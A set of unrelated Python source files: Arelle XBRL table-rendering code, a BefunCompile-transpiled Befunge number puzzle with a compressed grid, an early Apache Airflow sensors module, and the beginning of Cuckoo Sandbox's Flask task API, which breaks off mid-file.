# if findHeader is None, return all header values in a list
# otherwise return aspect value matching header if any
depth = 0
n = structuralNode
while (n.parentStructuralNode is not None):
depth += 1
root = n = n.parentStructuralNode
headers = set()
headerValues = {}
def getHeaders(n, d):
for childStructuralNode in n.childStructuralNodes:
if d == depth:
h = childStructuralNode.header(lang=self.lang,
returnGenLabel=False,
returnMsgFormatString=False)
if not childStructuralNode.isEntryPrototype() and h:
headerValues[h] = childStructuralNode.aspectValue(aspect)
headers.add(h)
else:
getHeaders(childStructuralNode, d+1)
getHeaders(root, 1)
structuralNode.aspectEntryHeaderValues = headerValues
# is this an explicit dimension, if so add "(all members)" option at end
headersList = sorted(headers)
if isinstance(aspect, QName): # dimension
dimConcept = self.modelXbrl.qnameConcepts[aspect]
if dimConcept.isExplicitDimension:
if headersList: # has entries, add all-memembers at end
headersList.append("(all members)")
else: # empty list, just add all members anyway
return self.explicitDimensionFilterMembers(structuralNode, structuralNode)
return headersList
def onAspectComboboxSelection(self, event):
gridCombobox = event.widget
if gridCombobox.get() == "(all members)":
structuralNode = self.aspectEntryObjectIdsNode[gridCombobox.objectId]
self.comboboxLoadExplicitDimension(gridCombobox, structuralNode, structuralNode)
def comboboxLoadExplicitDimension(self, gridCombobox, structuralNode, structuralNodeWithFilter):
gridCombobox["values"] = self.explicitDimensionFilterMembers(structuralNode, structuralNodeWithFilter)
def explicitDimensionFilterMembers(self, structuralNode, structuralNodeWithFilter):
for aspect in structuralNodeWithFilter.aspectsCovered():
if isinstance(aspect, QName): # dimension
break
valueHeaders = set()
if structuralNode is not None:
headerValues = {}
# check for dimension filter(s)
dimFilterRels = structuralNodeWithFilter.definitionNode.filterRelationships
if dimFilterRels:
for rel in dimFilterRels:
dimFilter = rel.toModelObject
if dimFilter is not None:
for memberModel in dimFilter.memberProgs:
memQname = memberModel.qname
memConcept = self.modelXbrl.qnameConcepts.get(memQname)
if memConcept is not None and (not memberModel.axis or memberModel.axis.endswith('-self')):
header = memConcept.label(lang=self.lang)
valueHeaders.add(header)
if rel.isUsable:
headerValues[header] = memQname
else:
headerValues[header] = memConcept
if memberModel.axis and memberModel.linkrole and memberModel.arcrole:
# merge of pull request 42 acsone:TABLE_Z_AXIS_DESCENDANT_OR_SELF
if memberModel.axis.endswith('-or-self'):
searchAxis = memberModel.axis[:len(memberModel.axis)-len('-or-self')]
else:
searchAxis = memberModel.axis
relationships = concept_relationships(self.rendrCntx,
None,
(memQname,
memberModel.linkrole,
memberModel.arcrole,
searchAxis),
False) # return flat list
for rel in relationships:
if rel.isUsable:
header = rel.toModelObject.label(lang=self.lang)
valueHeaders.add(header)
headerValues[header] = rel.toModelObject.qname
if not valueHeaders:
relationships = concept_relationships(self.rendrCntx,
None,
(aspect,
"XBRL-all-linkroles", # linkrole,
"XBRL-dimensions",
'descendant'),
False) # return flat list
for rel in relationships:
if (rel.arcrole in (XbrlConst.dimensionDomain, XbrlConst.domainMember)
and rel.isUsable):
header = rel.toModelObject.label(lang=self.lang)
valueHeaders.add(header)
headerValues[header] = rel.toModelObject.qname
structuralNode.aspectEntryHeaderValues = headerValues
return sorted(valueHeaders)
# import after other modules resolved to prevent circular references
from arelle.FunctionXfi import concept_relationships
| |
#!/usr/bin/env python2
# transpiled with BefunCompile v1.3.0 (c) 2017
import sys
import zlib, base64
_g = ("AR+LCAAAAAAABADdVMGO4yAM/RW3yV5AbDGQNkEIjfYDttfOKEr3xpUTp+6/r03SadrRaKRqTmspNQXbvPfspLy+vgJb82DwpJ1+nU7fWe/t7e1b8f1+NvETOx6P1X8X"
+ "vqv9R/UKDN5nJ4cxdZKXyEtDSwjP1Ityn8ZBdtmjGjdFw6rMM/VmjIu1Z+8HiXyBzn76Iq0mnkujxPbvts9oPaWibR8AzbfzZty+wNYLL4TBbC1mjTb3Pcjoe6nHvuKI"
+ "iOnnS2XazyQvtFbGpJ0x2XZiWl+/WNbGUzVN14c2nKdm4xXmeyDTorsPDUzCJ8Ngs0FFK5HAmFCoRNKWKSWNnj2EtQqh0F4trUcte2rmqClCdDZjpX6+3QaQorcko9GQ"
+ "xp00Ow9Wp1W5eKNO7WTn2NWIWCP+LNGxbaEt5j3x6lsq6B1mLywmxTq1uHcCM/86YmMykmikk+Yj6QfVq5pKomo7rWSj9tXu3bG93tOAbaBrQNReNnQwkcZepV6+iwqh"
+ "LSyEsbtkjKzyuvtJuPajha+NOE7R8zhqHkdM1iQh0SbpCzW+s6vmXjajQp+cuY5e5LwD5w1JLTH8cFgmuOOPhAayxR37QCMaZ0waHY0YiMj3jlAuGzUkZ6nhB3Kcld2c"
+ "5GUKpH8nKkZX38kbxrIiGUU0wGVFBWZckg3slXV5kCbRX3YlYjnEz2pBeKA4MzlcNXh8UxvWWqU5ar/wXej6EJeYyrFcgDjCTHK4J0kceScUFOEyBkcjhAuRtU0ris0Q"
+ "gTgCkVwo7meK+0QjKgTSwRTpGKT97PtS92m+KvoAU/fhk/Ixo0b8A6X0qdzQBwAA")
g = base64.b64decode(_g)[1:]
for i in range(ord(base64.b64decode(_g)[0])):
g = zlib.decompress(g, 16+zlib.MAX_WBITS)
g=list(map(ord, g))
def gr(x,y):
if(x>=0 and y>=0 and x<80 and y<25):
return g[y*80 + x];
return 0;
def gw(x,y,v):
if(x>=0 and y>=0 and x<80 and y<25):
g[y*80 + x]=v;
def td(a,b):
return ((0)if(b==0)else(a//b))
def tm(a,b):
return ((0)if(b==0)else(a%b))
s=[]
def sp():
global s
if (len(s) == 0):
return 0
return s.pop()
def sa(v):
global s
s.append(v)
def sr():
global s
if (len(s) == 0):
return 0
return s[-1]
def _0():
gw(2,1,67108864)
gw(3,1,3)
gw(1,3,0)
gw(24,8,0)
sa(15)
sa(15)
return 1
def _1():
return (55)if(sp()!=0)else(2)
def _2():
sp();
return 3
def _3():
global t0
t0=gr(3,1)
sa(gr(3,1))
sa(gr(3,1))
gw(1,0,0)
gw(2,0,t0)
return 4
def _4():
global t0
global t1
gw(3,0,sp())
t0=gr(2,0)
sa(sr());
sa(t0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
v0=sp()
sa(td(sp(),v0))
t1=sp()
sa(sp()+t1)
sa(sp()/2);
return (53)if((sr()-gr(3,0))!=0)else(5)
def _5():
global t0
t0=gr(3,0)*gr(3,0)
gw(4,1,gr(3,0))
t0=t0-gr(3,1)
sp();
return (6)if((t0)!=0)else(52)
def _6():
gw(24,5,0)
gw(24,4,0)
gw(24,1,0)
gw(24,0,0)
sa(15)
sa(15)
return 7
def _7():
return (51)if(sp()!=0)else(8)
def _8():
gw(24,1,1)
gw(24,4,1)
gw(1,2,0)
gw(2,2,1)
sp();
return 9
def _9():
gw(3,2,td(gr(4,1)+gr(1,2),gr(2,2)))
sa(15)
sa(15)
sa(gr(24,0)+(gr(24,1)*gr(3,2))+gr(1,3))
gw(1,3,td(gr(24,0)+(gr(24,1)*gr(3,2))+gr(1,3),gr(2,1)))
return 10
def _10():
sa(tm(sp(),gr(2,1)))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(2)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return (50)if(sp()!=0)else(11)
def _11():
sp();
sa(15)
sa(15)
sa(gr(24,4)+(gr(24,5)*gr(3,2))+gr(1,3))
gw(1,3,td(gr(24,4)+(gr(24,5)*gr(3,2))+gr(1,3),gr(2,1)))
return 12
def _12():
sa(tm(sp(),gr(2,1)))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(6)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return (13)if(sp()!=0)else(14)
def _13():
global t0
global t1
sa(sr());
sa(sr());
t0=gr(sr()+9,4)
sa(sp()+9)
sa(5)
v0=sp()
t1=gr(sp(),v0)
t1=t1*gr(3,2)
sa(t0+t1+gr(1,3))
gw(1,3,td(sr(),gr(2,1)))
return 12
def _14():
gw(1,4,1)
gw(24,9,0)
sp();
sa(14)
sa(15)
return 15
def _15():
return (49)if(sp()!=0)else(16)
def _16():
gw(2,4,15)
sp();
return 17
def _17():
gw(3,4,gr(2,4)+9)
sa(15)
sa((gr(24,6)*gr(gr(2,4)+9,6)*gr(3,1))+gr(1,4)+gr(gr(3,4),9))
gw(1,4,td((gr(24,6)*gr(gr(2,4)+9,6)*gr(3,1))+gr(1,4)+gr(gr(3,4),9),gr(2,1)))
return 18
def _18():
sa(tm(sp(),gr(2,1)))
gw(gr(3,4),9,sp())
sa(sp()-1)
return (48)if(gr(3,4)!=9)else(19)
def _19():
global t0
t0=gr(2,4)-1
sp();
return (47)if((gr(2,4))!=0)else(20)
def _20():
gw(1,4,0)
gw(24,7,0)
sa(14)
sa(15)
return 21
def _21():
return (46)if(sp()!=0)else(22)
def _22():
gw(2,4,15)
sp();
return 23
def _23():
gw(3,4,gr(2,4)+9)
sa(15)
sa((gr(24,2)*gr(gr(2,4)+9,2))+gr(1,4)+gr(gr(3,4),7))
gw(1,4,td((gr(24,2)*gr(gr(2,4)+9,2))+gr(1,4)+gr(gr(3,4),7),gr(2,1)))
return 24
def _24():
sa(tm(sp(),gr(2,1)))
gw(gr(3,4),7,sp())
sa(sp()-1)
return (45)if(gr(3,4)!=9)else(25)
def _25():
global t0
t0=gr(2,4)-1
sp();
return (44)if((gr(2,4))!=0)else(26)
def _26():
sa(15)
sa(gr(24,7)-gr(24,9))
return 27
def _27():
return (40)if(sp()!=0)else(28)
def _28():
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return (29)if(sp()!=0)else(30)
def _29():
global t0
global t1
sa(sr());
t0=gr(sr()+9,7)
sa(sp()+9)
sa(9)
v0=sp()
t1=gr(sp(),v0)
sa(t0-t1)
return 27
def _30():
global t0
global t1
t0=1
t1=1
sp();
sa(0)
sa(gr(9,2)-gr(9,8))
sa(gr(9,2)-gr(9,8))
return 31
def _31():
return (36)if(sp()!=0)else(32)
def _32():
sp();
sa(sp()+1)
return (35)if(sr()!=17)else(33)
def _33():
global t0
t0=gr(3,1)-999
gw(3,1,gr(3,1)+1)
sp();
return (3)if((t0)!=0)else(34)
def _34():
sys.stdout.write(str(gr(1,1))+" ")
sys.stdout.flush()
return 56
def _35():
global t0
global t1
sa(sr());
t0=gr(sr()+9,2)
sa(sp()+9)
sa(8)
v0=sp()
t1=gr(sp(),v0)
sa(t0-t1)
sa(t0-t1)
return 31
def _36():
sa((1)if(sp()>0)else(0))
return (37)if(sp()!=0)else(33)
def _37():
gw(1,1,gr(3,1))
gw(24,8,gr(24,2))
sp();
sa(14)
sa(15)
return 38
def _38():
return (39)if(sp()!=0)else(33)
def _39():
sa(sr());
sa(gr(sr()+9,2))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(8)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return 38
def _40():
gw(1,2,(gr(3,2)*gr(2,2))-gr(1,2))
gw(2,2,td(gr(3,1)-(gr(1,2)*gr(1,2)),gr(2,2)))
sp();
sa(15)
sa(0)
return 41
def _41():
return (42)if(sp()!=0)else(43)
def _42():
sp();
return 9
def _43():
sa(sr());
sa(gr(sr()+9,1))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(0)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr());
sa(gr(sr()+9,2))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(1)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr());
sa(gr(sr()+9,5))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(4)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr());
sa(gr(sr()+9,6))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(5)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa((0)if(sp()!=0)else(1))
return 41
def _44():
global t0
gw(2,4,t0)
return 23
def _45():
sa(sr());
gw(3,4,(sr()+gr(2,4))-6)
sa(sp()+9)
sa(2)
v0=sp()
sa(gr(sp(),v0))
sa(sp()*gr(gr(2,4)+9,2))
sa(sp()+gr(1,4))
sa(sp()+gr(gr(3,4),7))
gw(1,4,td(sr(),gr(2,1)))
return 24
def _46():
sa(sr()+9)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(7)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return 21
def _47():
global t0
gw(2,4,t0)
return 17
def _48():
sa(sr());
gw(3,4,(sr()+gr(2,4))-6)
sa(sp()+9)
sa(6)
v0=sp()
sa(gr(sp(),v0))
sa(sp()*gr(gr(2,4)+9,6)*gr(3,1))
sa(sp()+gr(1,4))
sa(sp()+gr(gr(3,4),9))
gw(1,4,td(sr(),gr(2,1)))
return 18
def _49():
sa(sr()+9)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(9)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return 15
def _50():
global t0
global t1
sa(sr());
sa(sr());
t0=gr(sr()+9,0)
sa(sp()+9)
sa(1)
v0=sp()
t1=gr(sp(),v0)
t1=t1*gr(3,2)
sa(t0+t1+gr(1,3))
gw(1,3,td(sr(),gr(2,1)))
return 10
def _51():
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(5)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(4)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(1)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(0)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sp()-1)
sa(sr());
return 7
def _52():
global t0
gw(3,1,gr(3,1)+1)
t0=gr(3,1)
sa(gr(3,1))
sa(gr(3,1))
gw(1,0,0)
gw(2,0,t0)
return 4
def _53():
return (54)if((sr()-gr(1,0))!=0)else(5)
def _54():
gw(1,0,gr(3,0))
sa(sr());
return 4
def _55():
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(8)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sp()-1)
sa(sr());
return 1
m=[_0,_1,_2,_3,_4,_5,_6,_7,_8,_9,_10,_11,_12,_13,_14,_15,_16,_17,_18,_19,_20,_21,_22,_23,_24,_25,_26,_27,_28,_29,_30,_31,_32,_33,_34,_35,_36,_37,_38,_39,_40,_41,_42,_43,_44,_45,_46,_47,_48,_49,_50,_51,_52,_53,_54,_55]
c=0
while c<56:
c=m[c]()
| |
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from datetime import datetime
import logging
from urllib.parse import urlparse
from time import sleep
from airflow import hooks, settings
from airflow.models import BaseOperator
from airflow.models import Connection as DB
from airflow.models import State
from airflow.models import TaskInstance
from airflow.utils import (
apply_defaults, AirflowException, AirflowSensorTimeout)
class BaseSensorOperator(BaseOperator):
'''
Sensor operators are derived from this class an inherit these attributes.
Sensor operators keep executing at a time interval and succeed when
a criteria is met and fail if and when they time out.
:param poke_interval: Time in seconds that the job should wait in
between each tries
:type poke_interval: int
:param timeout: Time, in seconds before the task times out and fails.
:type timeout: int
'''
ui_color = '#e6f1f2'
@apply_defaults
def __init__(
self,
poke_interval=60,
timeout=60*60*24*7,
*args, **kwargs):
super(BaseSensorOperator, self).__init__(*args, **kwargs)
self.poke_interval = poke_interval
self.timeout = timeout
def poke(self, context):
'''
Function that the sensors defined while deriving this class should
override.
'''
raise AirflowException('Override me.')
def execute(self, context):
started_at = datetime.now()
while not self.poke(context):
sleep(self.poke_interval)
if (datetime.now() - started_at).seconds > self.timeout:
raise AirflowSensorTimeout('Snap. Time is OUT.')
logging.info("Success criteria met. Exiting.")
class SqlSensor(BaseSensorOperator):
"""
Runs a sql statement until a criteria is met. It will keep trying until
sql returns no row, or if the first cell in (0, '0', '').
:param conn_id: The connection to run the sensor against
:type conn_id: string
:param sql: The sql to run. To pass, it needs to return at least one cell
that contains a non-zero / empty string value.
"""
template_fields = ('sql',)
template_ext = ('.hql', '.sql',)
@apply_defaults
def __init__(self, conn_id, sql, *args, **kwargs):
super(SqlSensor, self).__init__(*args, **kwargs)
self.sql = sql
self.conn_id = conn_id
session = settings.Session()
db = session.query(DB).filter(DB.conn_id == conn_id).first()
if not db:
raise AirflowException("conn_id doesn't exist in the repository")
self.hook = db.get_hook()
session.commit()
session.close()
def poke(self, context):
logging.info('Poking: ' + self.sql)
records = self.hook.get_records(self.sql)
if not records:
return False
else:
if str(records[0][0]) in ('0', '',):
return False
else:
return True
print(records[0][0])
class ExternalTaskSensor(BaseSensorOperator):
"""
Waits for a task to complete in a different DAG
:param external_dag_id: The dag_id that contains the task you want to
wait for
:type external_dag_id: string
:param external_task_id: The task_id that contains the task you want to
wait for
:type external_task_id: string
:param allowed_states: list of allowed states, default is ``['success']``
:type allowed_states: list
:param execution_delta: time difference with the previous execution to
look at, the default is the same execution_date as the current task.
For yesterday, use [positive!] datetime.timedelta(days=1)
:type execution_delta: datetime.timedelta
"""
@apply_defaults
def __init__(
self,
external_dag_id,
external_task_id,
allowed_states=None,
execution_delta=None,
*args, **kwargs):
super(ExternalTaskSensor, self).__init__(*args, **kwargs)
self.allowed_states = allowed_states or [State.SUCCESS]
self.execution_delta = execution_delta
self.external_dag_id = external_dag_id
self.external_task_id = external_task_id
def poke(self, context):
logging.info(
'Poking for '
'{self.external_dag_id}.'
'{self.external_task_id} on '
'{context[execution_date]} ... '.format(**locals()))
TI = TaskInstance
if self.execution_delta:
dttm = context['execution_date'] - self.execution_delta
else:
dttm = context['execution_date']
session = settings.Session()
count = session.query(TI).filter(
TI.dag_id == self.external_dag_id,
TI.task_id == self.external_task_id,
TI.state.in_(self.allowed_states),
TI.execution_date == dttm,
).count()
session.commit()
session.close()
return count
class HivePartitionSensor(BaseSensorOperator):
"""
Waits for a partition to show up in Hive
:param table: The name of the table to wait for, supports the dot
notation (my_database.my_table)
:type table: string
:param partition: The partition clause to wait for. This is passed as
is to the Metastore Thrift client "get_partitions_by_filter" method,
and apparently supports SQL like notation as in `ds='2015-01-01'
AND type='value'` and > < sings as in "ds>=2015-01-01"
:type partition: string
"""
template_fields = ('schema', 'table', 'partition',)
@apply_defaults
def __init__(
self,
table, partition="ds='{{ ds }}'",
metastore_conn_id='metastore_default',
schema='default',
poke_interval=60*3,
*args, **kwargs):
super(HivePartitionSensor, self).__init__(
poke_interval=poke_interval, *args, **kwargs)
if not partition:
partition = "ds='{{ ds }}'"
self.metastore_conn_id = metastore_conn_id
self.table = table
self.partition = partition
self.schema = schema
def poke(self, context):
if '.' in self.table:
self.schema, self.table = self.table.split('.')
logging.info(
'Poking for table {self.schema}.{self.table}, '
'partition {self.partition}'.format(**locals()))
if not hasattr(self, 'hook'):
self.hook = hooks.HiveMetastoreHook(
metastore_conn_id=self.metastore_conn_id)
return self.hook.check_for_partition(
self.schema, self.table, self.partition)
class HdfsSensor(BaseSensorOperator):
"""
Waits for a file or folder to land in HDFS
"""
template_fields = ('filepath',)
@apply_defaults
def __init__(
self,
filepath,
hdfs_conn_id='hdfs_default',
*args, **kwargs):
super(HdfsSensor, self).__init__(*args, **kwargs)
self.filepath = filepath
self.hdfs_conn_id = hdfs_conn_id
def poke(self, context):
sb = hooks.HDFSHook(self.hdfs_conn_id).get_conn()
logging.getLogger("snakebite").setLevel(logging.WARNING)
logging.info(
'Poking for file {self.filepath} '.format(**locals()))
try:
files = [f for f in sb.ls([self.filepath])]
except:
return False
return True
class S3KeySensor(BaseSensorOperator):
"""
Waits for a key (a file-like instance on S3) to be present in a S3 bucket.
S3 being a key/value it does not support folders. The path is just a key
a resource.
:param bucket_key: The key being waited on. Supports full s3:// style url
or relative path from root level.
:type bucket_key: str
:param bucket_name: Name of the S3 bucket
:type bucket_name: str
:param wildcard_match: whether the bucket_key should be interpreted as a
Unix wildcard pattern
:type wildcard_match: bool
"""
template_fields = ('bucket_key', 'bucket_name')
@apply_defaults
def __init__(
self, bucket_key,
bucket_name=None,
wildcard_match=False,
s3_conn_id='s3_default',
*args, **kwargs):
super(S3KeySensor, self).__init__(*args, **kwargs)
session = settings.Session()
db = session.query(DB).filter(DB.conn_id == s3_conn_id).first()
if not db:
raise AirflowException("conn_id doesn't exist in the repository")
# Parse
if bucket_name is None:
parsed_url = urlparse(bucket_key)
if parsed_url.netloc == '':
raise AirflowException('Please provide a bucket_name')
else:
bucket_name = parsed_url.netloc
if parsed_url.path[0] == '/':
bucket_key = parsed_url.path[1:]
else:
bucket_key = parsed_url.path
self.bucket_name = bucket_name
self.bucket_key = bucket_key
self.wildcard_match = wildcard_match
self.s3_conn_id = s3_conn_id
session.commit()
session.close()
def poke(self, context):
hook = hooks.S3Hook(s3_conn_id=self.s3_conn_id)
full_url = "s3://" + self.bucket_name + self.bucket_key
logging.info('Poking for key : {full_url}'.format(**locals()))
if self.wildcard_match:
return hook.check_for_wildcard_key(self.bucket_key,
self.bucket_name)
else:
return hook.check_for_key(self.bucket_key, self.bucket_name)
class S3PrefixSensor(BaseSensorOperator):
"""
Waits for a prefix to exist. A prefix is the first part of a key,
thus enabling checking of constructs similar to glob airfl* or
SQL LIKE 'airfl%'. There is the possibility to precise a delimiter to
indicate the hierarchy or keys, meaning that the match will stop at that
delimiter. Current code accepts sane delimiters, i.e. characters that
are NOT special characters in the Python regex engine.
:param bucket_name: Name of the S3 bucket
:type bucket_name: str
:param prefix: The prefix being waited on. Relative path from bucket root level.
:type prefix: str
:param delimiter: The delimiter intended to show hierarchy.
Defaults to '/'.
:type delimiter: str
"""
template_fields = ('prefix', 'bucket_name')
@apply_defaults
def __init__(
self, bucket_name,
prefix, delimiter='/',
s3_conn_id='s3_default',
*args, **kwargs):
super(S3PrefixSensor, self).__init__(*args, **kwargs)
session = settings.Session()
db = session.query(DB).filter(DB.conn_id == s3_conn_id).first()
if not db:
raise AirflowException("conn_id doesn't exist in the repository")
# Parse
self.bucket_name = bucket_name
self.prefix = prefix
self.delimiter = delimiter
self.full_url = "s3://" + bucket_name + '/' + prefix
self.s3_conn_id = s3_conn_id
session.commit()
session.close()
def poke(self, context):
logging.info('Poking for prefix : {self.prefix}\n'
'in bucket s3://{self.bucket_name}'.format(**locals()))
hook = hooks.S3Hook(s3_conn_id=self.s3_conn_id)
return hook.check_for_prefix(
prefix=self.prefix,
delimiter=self.delimiter,
bucket_name=self.bucket_name)
class TimeSensor(BaseSensorOperator):
"""
Waits until the specified time of the day.
:param target_time: time after which the job succeeds
:type target_time: datetime.time
"""
template_fields = tuple()
@apply_defaults
def __init__(self, target_time, *args, **kwargs):
super(TimeSensor, self).__init__(*args, **kwargs)
self.target_time = target_time
def poke(self, context):
logging.info(
'Checking if the time ({0}) has come'.format(self.target_time))
return datetime.now().time() > self.target_time
class TimeDeltaSensor(BaseSensorOperator):
"""
Waits for a timedelta after the task's execution_date + schedule_interval.
In Airflow, the daily task stamped with ``execution_date``
2016-01-01 can only start running on 2016-01-02. The timedelta here
represents the time after the execution period has closed.
:param delta: time length to wait after execution_date before succeeding
:type delta: datetime.timedelta
"""
template_fields = tuple()
@apply_defaults
def __init__(self, delta, *args, **kwargs):
super(TimeDeltaSensor, self).__init__(*args, **kwargs)
self.delta = delta
def poke(self, context):
target_dttm = (
context['execution_date'] +
context['dag'].schedule_interval +
self.delta)
logging.info('Checking if the time ({0}) has come'.format(target_dttm))
return datetime.now() > target_dttm
class HttpSensor(BaseSensorOperator):
"""
Executes a HTTP get statement and returns False on failure:
404 not found or response_check function returned False
:param http_conn_id: The connection to run the sensor against
:type http_conn_id: string
:param endpoint: The relative part of the full url
:type endpoint: string
:param params: The parameters to be added to the GET url
:type params: a dictionary of string key/value pairs
:param headers: The HTTP headers to be added to the GET request
:type headers: a dictionary of string key/value pairs
:param response_check: A check against the 'requests' response object.
Returns True for 'pass' and False otherwise.
:type response_check: A lambda or defined function.
:param extra_options: Extra options for the 'requests' library, see the
'requests' documentation (options to modify timeout, ssl, etc.)
:type extra_options: A dictionary of options, where key is string and value
depends on the option that's being modified.
"""
template_fields = ('endpoint',)
@apply_defaults
def __init__(self,
endpoint,
http_conn_id='http_default',
params=None,
headers=None,
response_check=None,
extra_options=None, *args, **kwargs):
super(HttpSensor, self).__init__(*args, **kwargs)
self.endpoint = endpoint
self.http_conn_id = http_conn_id
self.params = params or {}
self.headers = headers or {}
self.extra_options = extra_options or {}
self.response_check = response_check
self.hook = hooks.HttpHook(method='GET', http_conn_id=http_conn_id)
def poke(self, context):
logging.info('Poking: ' + self.endpoint)
try:
response = self.hook.run(self.endpoint,
data=self.params,
headers=self.headers,
extra_options=self.extra_options)
if self.response_check:
# run content check on response
return self.response_check(response)
except AirflowException as ae:
if ae.message.startswith("404"):
return False
return True
| |
#!/usr/bin/env python
# Copyright (C) 2010-2013 Claudio Guarnieri.
# Copyright (C) 2014-2016 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import os
import sys
import socket
import tarfile
import argparse
from datetime import datetime
from StringIO import StringIO
from zipfile import ZipFile, ZIP_STORED
try:
from flask import Flask, request, jsonify, make_response
except ImportError:
sys.exit("ERROR: Flask library is missing (`pip install flask`)")
sys.path.insert(0, os.path.join(os.path.abspath(os.path.dirname(__file__)), ".."))
from lib.cuckoo.common.constants import CUCKOO_VERSION, CUCKOO_ROOT
from lib.cuckoo.common.utils import store_temp_file, delete_folder
from lib.cuckoo.core.database import Database, TASK_RUNNING, Task
from lib.cuckoo.core.database import TASK_REPORTED, TASK_COMPLETED
from lib.cuckoo.core.startup import drop_privileges
from lib.cuckoo.core.rooter import rooter
# Global Database object.
db = Database()
# Initialize Flask app.
app = Flask(__name__)
def json_error(status_code, message):
"""Return a JSON object with a HTTP error code."""
r = jsonify(message=message)
r.status_code = status_code
return r
@app.after_request
def custom_headers(response):
"""Set some custom headers across all HTTP responses."""
response.headers["Server"] = "Machete Server"
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["X-Frame-Options"] = "DENY"
response.headers["X-XSS-Protection"] = "1; mode=block"
response.headers["Pragma"] = "no-cache"
response.headers["Cache-Control"] = "no-cache"
response.headers["Expires"] = "0"
return response
@app.route("/tasks/create/file", methods=["POST"])
@app.route("/v1/tasks/create/file", methods=["POST"])
def tasks_create_file():
data = request.files["file"]
package = request.form.get("package", "")
timeout = request.form.get("timeout", "")
priority = request.form.get("priority", 1)
options = request.form.get("options", "")
machine = request.form.get("machine", "")
platform = request.form.get("platform", "")
tags = request.form.get("tags", None)
custom = request.form.get("custom", "")
owner = request.form.get("owner", "")
memory = request.form.get("memory", False)
clock = request.form.get("clock", None)
if memory:
memory = True
enforce_timeout = request.form.get("enforce_timeout", False)
if enforce_timeout:
enforce_timeout = True
temp_file_path = store_temp_file(data.read(), data.filename)
task_id = db.add_path(
file_path=temp_file_path,
package=package,
timeout=timeout,
priority=priority,
options=options,
machine=machine,
platform=platform,
tags=tags,
custom=custom,
owner=owner,
memory=memory,
enforce_timeout=enforce_timeout,
clock=clock
)
return jsonify(task_id=task_id)
@app.route("/tasks/create/url", methods=["POST"])
@app.route("/v1/tasks/create/url", methods=["POST"])
def tasks_create_url():
url = request.form.get("url")
package = request.form.get("package", "")
timeout = request.form.get("timeout", "")
priority = request.form.get("priority", 1)
options = request.form.get("options", "")
machine = request.form.get("machine", "")
platform = request.form.get("platform", "")
tags = request.form.get("tags", None)
custom = request.form.get("custom", "")
owner = request.form.get("owner", "")
memory = request.form.get("memory", False)
if memory:
memory = True
enforce_timeout = request.form.get("enforce_timeout", False)
if enforce_timeout:
enforce_timeout = True
clock = request.form.get("clock", None)
task_id = db.add_url(
url=url,
package=package,
timeout=timeout,
options=options,
priority=priority,
machine=machine,
platform=platform,
tags=tags,
custom=custom,
owner=owner,
memory=memory,
enforce_timeout=enforce_timeout,
clock=clock
)
return jsonify(task_id=task_id)
@app.route("/tasks/list")
@app.route("/v1/tasks/list")
@app.route("/tasks/list/<int:limit>")
@app.route("/v1/tasks/list/<int:limit>")
@app.route("/tasks/list/<int:limit>/<int:offset>")
@app.route("/v1/tasks/list/<int:limit>/<int:offset>")
def tasks_list(limit=None, offset=None):
response = {}
response["tasks"] = []
completed_after = request.args.get("completed_after")
if completed_after:
completed_after = datetime.fromtimestamp(int(completed_after))
owner = request.args.get("owner")
status = request.args.get("status")
for row in db.list_tasks(limit=limit, details=True, offset=offset,
completed_after=completed_after, owner=owner,
status=status, order_by=Task.completed_on.asc()):
task = row.to_dict()
# Sanitize the target in case it contains non-ASCII characters as we
# can't pass along an encoding to flask's jsonify().
task["target"] = task["target"].decode("latin-1")
task["guest"] = {}
if row.guest:
task["guest"] = row.guest.to_dict()
task["errors"] = []
for error in row.errors:
task["errors"].append(error.message)
task["sample"] = {}
if row.sample_id:
sample = db.view_sample(row.sample_id)
task["sample"] = sample.to_dict()
response["tasks"].append(task)
return jsonify(response)
@app.route("/tasks/view/<int:task_id>")
@app.route("/v1/tasks/view/<int:task_id>")
def tasks_view(task_id):
